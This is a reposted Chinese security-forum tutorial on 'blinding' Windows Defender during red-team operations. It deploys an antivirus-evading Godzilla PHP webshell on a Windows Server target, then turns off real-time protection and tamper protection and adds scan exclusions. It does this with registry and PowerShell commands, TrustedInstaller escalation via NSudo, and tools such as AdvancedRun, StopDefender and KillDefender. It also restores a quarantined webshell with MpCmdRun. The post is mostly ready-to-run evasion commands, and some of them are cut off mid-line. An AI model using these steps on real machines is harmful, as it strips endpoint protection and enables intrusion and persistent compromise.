安全矩阵

 找回密码
 立即注册
搜索
查看: 820|回复: 0

红蓝对抗之致盲 Windows defender

[复制链接]

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2022-11-26 10:44:06 | 显示全部楼层 |阅读模式
本帖最后由 wangqiang 于 2022-11-26 10:47 编辑

红蓝对抗之致盲 Windows defender
红队蓝军 2022-11-25 12:29 发表于湖北
转载自:红蓝对抗之致盲 Windows defender
以下文章来源于亿人安全 ,作者CCJ


Windows defender 介绍
Microsoft Defender 防病毒软件在 Windows 10 和 Windows 11 以及 Windows Server 版本中可用。
Microsoft Defender 防病毒软件是 Microsoft Defender for Endpoint 中下一代保护的主要组件。这种保护将机器学习、大数据分析、
深入的威胁防御研究和 Microsoft 云基础设施结合在一起,以保护您组织中的设备(或端点)。Microsoft Defender 防病毒软件内置于 Windows 中,
它与 Microsoft Defender for Endpoint 配合使用,为你的设备和云提供保护。

Windows defender 环境



版本

Windows Server 系统环境
  • 用户:Administrator
  • 版本:Windows Server 2019
补丁

systeminfo 信息

事前准备
在实战环境中,首先需要上传webshell,所以在此必须免杀webshell
web环境:phpstudy 8.1.1.3 + apache 2.4.39 + php 7.3.4

哥斯拉 webshell 免杀工具地址:https://github.com/BeichenDream/Godzilla
经过测试,用Godzilla自带的PHP_XOR_BASE64加密器即可免杀(php一句话直接杀)
生成 PHP_XOR_BASE64 webshell

静态免杀测试

连接webshell

动态免杀测试

基础命令介绍cmd
  1. #查看排除项
  2. reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
  3. #查看版本
  4. dir "C:\ProgramData\Microsoft\Windows Defender\Platform" /od /ad /b
  5. #查看篡改保护(返回结果中的 数值5代表开启,数值4代表关闭)
  6. reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"


  7. #需要TrustedInstaller权限
  8. ##cmd注册表关闭Windows defender
  9. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f
  10. ##cmd关闭篡改保护
  11. NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /d 4 /t REG_DWORD /f"
  12. ##cmd注册表恢复Windows defender
  13. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f
  14. ##cmd添加Windows defender排除项
  15. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\temp"
复制代码

powershell
  1. #查看排除项
  2. Get-MpPreference | select ExclusionPath

  3. #关闭Windows defender
  4. Set-MpPreference -DisableRealTimeMonitoring $true

  5. #增加排除项
  6. Add-MpPreference -ExclusionPath "c:\temp"

  7. #删除排除项
  8. Remove-MpPreference -ExclusionPath "C:\test"

  9. #关闭实时保护
  10. Set-MpPreference -DisableRealtimeMonitoring $true
复制代码

关闭 Windows defenderTrustedInstaller
TrustedInstaller是从Windows Vista开始出现的一个内置安全主体,在Windows中拥有修改系统文件权限,本身是一个服务,以一个账户组的形式出现。
它的全名是:NT SERVICE\TrustedInstaller

为什么要获取TrustedInstaller权限?
说白了就是因为Administratior权限system权限无法关闭Windows defender

注意:以下工具技巧皆需要Administratior权限才能成功使用
NSudoLG工具地址:https://github.com/M2Team/NSudo
下载后使用:D:\Documents\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe

免杀测试

使用方法
注意:此工具的 -U:T 参数是获取了 TrustedInstaller 权限
  1. #cmd注册表关闭Windows defender
  2. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f
  3. #cmd注册表恢复Windows defender
  4. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f
  5. #cmd添加Windows defender排除项
  6. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\temp" /d 0 /t REG_DWORD /f

  7. #NSudoLG.exe关闭Windows defender
  8. NSudoLG.exe -U:T cmd /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f"
  9. #NSudoLG.exe恢复Windows defender
  10. NSudoLG.exe -U:T cmd /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f"
  11. #NSudoLG.exe添加Windows defender排除项
  12. NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclus
复制代码




powershell成功上线

AdvancedRun
地址:https://www.nirsoft.net/utils/advanced_run.html

免杀测试

使用方法
  1. AdvancedRun.exe /EXEFilename "%windir%\system32\cmd.exe" /CommandLine '/c reg add "HKEY_LOCAL_M
复制代码


powershell成功上线

StopDefender
Github地址:https://github.com/lab52io/StopDefender

免杀测试

使用方法
  1. StopDefender_x64.exe
复制代码


powershell成功上线

powershell
  1. #查看排除项
  2. Get-MpPreference | select ExclusionPath

  3. #关闭Windows defender
  4. Set-MpPreference -DisableRealTimeMonitoring $true

  5. #增加排除项
  6. Add-MpPreference -ExclusionPath "c:\temp"

  7. #删除排除项
  8. Remove-MpPreference -ExclusionPath "C:\test"
复制代码

关闭 Windows defender

关闭 实时保护
  1. Set-MpPreference -DisableRealtimeMonitoring $true
复制代码


其他技巧
MpCmdRun恢复被隔离的文件MpCmdRun介绍
配置和管理 Microsoft Defender 防病毒软件的命令行工具
详情
https://learn.microsoft.com/en-u ... view=o365-worldwide
寻找MpCmdRun位置MpCmdRun的位置为:
C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
  1. #查看版本(查看<antimalware platform version>)
  2. dir "C:\ProgramData\Microsoft\Windows Defender\Platform" /od /ad /b

  3. #验证
  4. dir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.6-0" | findstr MpCmdRun
复制代码


基础命令
  1. #查看被隔离的文件列表
  2. MpCmdRun -Restore -ListAll

  3. #恢复指定名称的文件至原目录
  4. MpCmdRun -Restore -FilePath C:\phpstudy_pro\WWW\shell.php

  5. #恢复所有文件至原目录
  6. MpCmdRun -Restore -All

  7. #查看指定路径是否位于排除列表中
  8. MpCmdRun -CheckExclusion -path C:\phpstudy_pro\WWW\
复制代码

移除Token导致Windows Defender失效
Windows Defender进程为MsMpEng.exe,MsMpEng.exe是一个受保护的进程(Protected Process Light,简写为PPL)
非 PPL 进程无法获取 PPL 进程的句柄,导致我们无法直接结束 PPL 进程 MsMpEng.exe, 但是我们能够以 SYSTEM 权限运行的线程修改进程 MsMpEng.exe 的 token,
当我们移除进程 MsMpEng.exe 的所有 token 后,进程 MsMpEng.exe 无法访问其他进程的资源,也就无法检测其他进程是否有害,最终导致 Windows Defender 失效。
本人没有利用成功过

工具地址
https://github.com/pwn1sher/KillDefender
https://github.com/Octoberfest7/KillDefender
https://github.com/Octoberfest7/KDStab
参考文章
https://mp.weixin.qq.com/s/27rvHpsnldnxpJaxwQrLGw
https://zhuanlan.zhihu.com/p/538571344
https://3gstudent.github.io/%E6% ... 80-Windows-Defender
https://cloud.tencent.com/developer/article/1870239



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-28 16:59 , Processed in 0.014970 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表